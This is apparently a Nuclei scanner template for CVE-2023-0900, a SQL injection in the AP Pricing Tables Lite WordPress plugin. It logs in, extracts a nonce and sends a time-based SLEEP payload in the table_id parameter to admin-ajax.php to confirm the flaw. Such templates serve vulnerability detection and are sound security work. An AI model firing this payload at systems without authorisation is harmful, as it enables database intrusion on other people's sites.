id: CVE-2023-0900 info: name: AP Pricing Tables Lite <= 1.1.6 - SQL Injection author: r3Y3r53 severity: high description: | The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high-privilege users such as admins. reference: - https://wpscan.com/vulnerability/f601e637-a486-4f3a-9077-4f294ace7ea1 - https://github.com/WPPlugins/ap-pricing-tables-lite - https://nvd.nist.gov/vuln/detail/CVE-2023-0900 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H cvss-score: 7.2 cve-id: CVE-2023-0900 cwe-id: CWE-89 epss-score: 0.00979 epss-percentile: 0.81794 cpe: cpe:2.3:a:wpdevart:pricing_table_builder:*:*:*:*:*:wordpress:*:* metadata: verified: true max-request: 3 vendor: wpdevart product: pricing_table_builder framework: wordpress publicwww-query: "wp-content/plugins/ap-pricing-tables-lite" tags: cve2023,cve,sqli,wordpress,wp-plugin,wp,authenticated,wpscan,ap-pricing-tables-lite,wpdevart http: - raw: - | POST /wp-login.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded log={{username}}&pwd={{password}}&wp-submit=Log+In - | GET /wp-admin/admin.php?page=ap-pricing-tables-lite&message=1 HTTP/1.1 Host: {{Hostname}} - | @timeout: 20s POST /wp-admin/admin-ajax.php HTTP/1.1 Host: {{Hostname}} X-Requested-With: XMLHttpRequest Content-Type: application/x-www-form-urlencoded action=backend_ajax&_action=copy_table&table_id=1+AND+(SELECT+2035+FROM+(SELECT(SLEEP(10)))A)&_wpnonce={{nonce}} matchers: - type: dsl dsl: - 'duration_3>=5' - 'status_code_3 == 200' - 'contains(body_3, "Security check")' - 'contains(body_2, "ap-pricing-tables-lite")' condition: and extractors: - type: regex name: nonce part: body group: 1 regex: - '_wpnonce=([0-9a-z]+)">Log Out' internal: true # digest: 490a0046304402207be51621913956682529761bdc463fc049801e290b4101be71e7589e8c20009e022073af0e380ffe2edd01a7f422feae41ee96f742d6720817f4138655b2c2fd30a8:922c64590222798bb761d5b6d8e72950